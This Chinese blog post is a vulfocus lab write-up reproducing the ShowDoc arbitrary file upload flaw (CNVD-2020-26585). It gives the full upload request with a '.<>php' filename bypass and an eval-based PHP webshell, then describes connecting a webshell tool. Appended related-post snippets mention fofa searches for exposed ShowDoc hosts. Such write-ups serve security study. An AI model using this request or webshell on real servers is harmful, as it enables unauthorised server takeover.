vulfocus——showdoc文件上传(cnvd-2020-26585)

最新推荐文章于 2024-08-22 22:20:50 发布
原创 最新推荐文章于 2024-08-22 22:20:50 发布 · 1.4k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#servlet #jar #java

本文介绍了一个存在于ShowDoc工具中的任意文件上传漏洞。利用该漏洞,攻击者可以通过特定的HTTP请求上传恶意文件,如包含后门的PHP脚本,并进一步获取服务器权限。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

描述

 ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。
api_page存在任意文件上传.

复现

1.打开web页面直接抓包,然后改包

POST /index.php?s=/home/page/uploadImg HTTP/1.1
Host: 123.58.224.8:13374
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_sid=rpp3fr; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; PHPSESSID=qi82pvceb9i3lf2fm6q7majkt7; think_language=zh-CN
Upgrade-Insecure-Requests: 1
If-Modified-Since: Sat, 27 Jun 2020 14:44:38 GMT
If-None-Match: "679-5a911dd6d0180-gzip"
Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617
Content-Length: 262

----------------------------921378126371623762173617
Content-Disposition: form-data; name="editormd-image-file"; filename="shelll.<>php"
Content-Type: text/plain

<?php echo 'hello';@eval($_POST[cmd])?>
----------------------------921378126371623762173617--

2.写入一句话木马,然后发送,返回文件路径

3.访问文件路径,出现“hello”,说明木马是成功写入的,用webshell工具连接获得flag

4.或者不使用webshell工具

ShowDoc漏洞学习——CNVD-2020-26585(任意文件上传
记录并分享学习安全的知识点..
07-24 1431
ShowDoc一个非常适合IT团队的API文档、技术文档工具。2.8.3以下版本的ShowDoc 存在任意文件上传漏洞,攻击者通过构造特殊的数据包可以上传恶意文件控制服务器。
CNVD-2020-26585showdoc 文件上传
qq_32445755的博客
05-22 326
简介 ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传 关键图片 链接: /index.php?s=/home/page/uploadImg 特征 关键性 复现 poc POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleW...
showdoc 文件上传CNVD-2020-26585
小小猪的博客
12-29 2768
showdoc 文件上传CNVD-2020-26585) 漏洞描述: ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传 影响范围: ShowDoc 版本 环境搭建: 在线环境 地址 漏洞复现: 访问首页 可以自己注册账号,也可以使用默认密码 showdoc 123456 找到上传点,抓包,构造poc POST /index.php?s=/home/page/uploadImg HTTP/1.1 Host: vulfocus.f.
0x03 ShowDoc 文件上传漏洞(CNVD-2020-26585)复现
最新发布
weixin_43263566的博客
08-22 1397
如果能成功访问就说明有可能存在漏洞,是否存在漏洞还需要后续进行上传测试。首先你可以编写个搜索fofa的脚本,用来收集目标ip。然后就可以编写ip验证脚本。
ShowDoc文件上传CNVD-2020-26585
qq_34341458的博客
04-01 4565
0x01 描述 描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。 0x02 影响范围 fofa搜索语句: app=“ShowDoc” 先访问链接:http://ip:prot/index.php?s=/home/page/uploadImg //文件上传漏洞的链接。如果出现“没有出现上传的文件”,说明可能存在漏洞并可以尝试利用。 0x03 漏洞复现 漏洞地址:http://vulfocus.io/#/dashboard?image_
ShowDoc文件上传(CNVD-2020-26585)
m0_65150886的博客
01-18 756
通过Showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc 2.8.3以下版本中存在安全漏洞,ShowDoc存在文件上传漏洞,攻击者可以利用漏洞获取服务器权限。1.访问http://ip:port,出现如下页面,开始实验。ShowDoc是一个非常适合IT团队的在线API文档、2.burp抓取该页面包,并修改get请求。
【漏洞复现-showdoc-文件上传】​vulfocus/showdoc-cnvd_2020_26585
10-10 2522
showdoc-文件上传】API_page存在任意文件上传
showdoc 文件上传cnvd-2020-26585
weixin_51559599的博客
10-27 364
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。api_page存在任意文件上传.
ShowDoc文件上传CNVD-2020-26585)复现
weixin_47260545的博客
05-21 448
描述: showdoc一个非常适合IT团队的API文档、技术文档工具。在前台存在文件上传,可以getshell。
showdoc文件上传-vulfocus/showdoc-cnvd_2020_26585:latest 漏洞复现实战
weixin_40416851的博客
12-13 478
ShowDoc是一个非常适合IT团队的在线API文档、技术文档工具。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。名称: vulfocus/showdoc-cnvd_2020_26585:latest。使用webshell工具连接,在/tmp目录下存在flag。api_page存在任意文件上传.
showdoc文档工具
07-16
开发过程中文档显示,一个非常适合IT团队的在线API文档、技术文档工具。你可以使用Showdoc来编写在线API文档、技术文档、数据字典、在线手册
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具.zip
10-10
showdoc, ShowDoc是一个非常适用于it团队在网上共享文档的工具 中文版教程:https://www.showdoc.cc/help什么是 ShowDoc?每当我们接受一个由它的他人开发的模块或者项目时,我们总是觉得那些没有注释的代码。 文档文件在哪里? ! 给我看看医生 ! 程序员经常希望它的他
ShowDoc<2.8.3 前台文件上传
m0_62207482的博客
04-08 510
构造上传请求就行了,上传表单的name属性为。,文件名要在php前面加一对。
showdoc 文件上传CNVD-2020-26585)复现
YouthBelief的博客
11-15 4160
showdoc 文件上传 CNVD-2020-26585showdoc 文件上传 CNVD-2020-265850x01 漏洞描述0x02 影响范围0x03 漏洞复现0x04 漏洞修复 所有文章,仅供安全研究与学习之用,后果自负! showdoc 文件上传 CNVD-2020-26585 0x01 漏洞描述 ShowDoc一个非常适合IT团队的在线API文档、技术文档工具。 api_page存在任意文件上传 0x02 影响范围 fofa语句: app=“ShowDoc” 0x03 漏洞复现 (1)
ShowDoc任意文件上传绕过手法分享
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
07-16 1149
因为你仍能痛苦,所以说明你对生活还抱有希望!
showdoc 文件上传漏洞(cnvd-2020-26585)
xy_wjyjw的博客
10-29 422
刷新页面,点击(Intercept is off)开始抓包。打开虚拟终端,输入命令(dir /tmp),查看flag。替换全部报文,修改Host和一句话木马。用蚁剑连接,连接成功,并添加。发送给respones,showdoc 文件上。在bp网页中打开ip(发送到Repeater。
vulfocus:typesetter 文件上传
qq_43332837的博客
08-24 270
管理员账号密码登入 点击已上传的档案 上传木马文件(zip文件) 解压 点击2.php得到路径 蚁剑连接得到flag
vulfocus】tomcat文件上传 (CVE-2017-12615)
RexHa的博客
10-17 2782
vulfocus靶场 tomcat-文件上传 名称: vulfocus/tomcat-cve_2017_12615:latest
【漏洞复现-weblogic-文件上传vulfocus/weblogic-cve_2018_2894
10-11 1714
【weblogic-文件上传】测试页面上传
vulfocus-showdoc
06-06
vulfocus-showdoc是一款基于Docker的Web安全漏洞环境,其中包含了常见的Web漏洞类型,如SQL注入、XSS、CSRF等等,并且内置了ShowDoc文档生成工具,方便对漏洞环境的使用和学习进行记录和总结。 ShowDoc是一款开源的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值